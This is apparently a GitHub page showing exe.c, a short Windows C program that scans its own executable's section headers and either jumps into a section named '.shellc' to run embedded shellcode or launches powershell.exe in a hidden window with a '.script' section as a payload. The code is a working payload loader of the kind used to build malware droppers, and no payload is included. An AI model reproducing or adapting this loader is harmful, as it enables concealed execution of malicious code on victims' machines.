-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexe.c
30 lines (27 loc) · 1.04 KB
/
exe.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <stdbool.h>
#include <stdint.h>
#include <windows.h>
bool _strcmp(const char* restrict a, const char* restrict b) {
while (*a != '\0' && *b != '\0'){
if (*a++ != *b++)
break;
}
return *a == '\0' && *b == '\0';
}
void _start() {
uintptr_t pModAddr = (uintptr_t)GetModuleHandleA(NULL);
IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)(pModAddr);
IMAGE_NT_HEADERS* pNTHeader = (IMAGE_NT_HEADERS*)(pModAddr + pDosHeader->e_lfanew);
IMAGE_SECTION_HEADER* pSections = (IMAGE_SECTION_HEADER*)(pNTHeader + 1);
for (int i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++) {
if (_strcmp(pSections[i].Name, ".shellc")) {
((void(*)())(pModAddr + pSections[i].VirtualAddress))(); // Execute shellcode
break;
}
if (_strcmp(pSections[i].Name, ".script")) {
ShellExecuteA(NULL, "open", "powershell.exe", (char*)(pModAddr + pSections[i].VirtualAddress), NULL, SW_HIDE); // Execute Powershell payload
break;
}
}
return;
}